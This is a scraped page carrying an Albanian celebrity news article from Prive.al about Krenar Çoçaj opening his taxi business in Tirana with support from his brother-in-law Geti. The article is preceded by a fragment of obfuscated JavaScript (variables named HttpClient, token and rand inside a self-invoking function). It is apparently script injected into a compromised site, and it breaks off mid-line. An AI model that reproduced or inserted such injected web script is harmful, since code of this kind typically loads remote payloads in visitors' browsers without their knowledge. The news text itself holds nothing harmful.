;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Geti përkrahë baxhanakun në sipërmarrjet e reja

By

Krenar Çoçaj mbetet mes Prishtinës dhe Tiranës.

Përkundër që partnerja e tij, prezantuesja Luana Vjollca u bë edhe me shtëpi edhe me banesë në Kosovë, punët që e lidhin atje, pashmangshëm zhvendosin çiftin në shumicën e kohës në Shqipëri.

Atje, Krenari është zgjeruar me biznese të reja.

Ai ka bartur përfaqësinë e linjës së tij të taksive që funksionon në Prishtinë, edhe në Tiranë.

Biznesi figuron i hapur me datë 13 dhjetor të vitit të kaluar, por tashmë po e merr formën e tij të plotë.

E Geti, ka përkrahur së fundmi përmes një postimi baxhanakun e tij, njëherësh shokun e mirë, Krenarin duke ndarë me ndjekësit taksitë e Tiranës në pronësi të Çoçajt.

Dyshja në shkurt të vitit 2020 hapën një biznes të ngjashëm i cili përfshinte edhe dhënien me qera të makinave. Por, i nisur pak ditë para karantinës së madhe, biznesi me aksionerë Getin dhe Krenarin, figuron i pezulluar prej kohësh në Qendrën Kombëtare të Bizneseve në Tiranë. /Prive.al

Artikuj të ngjashëm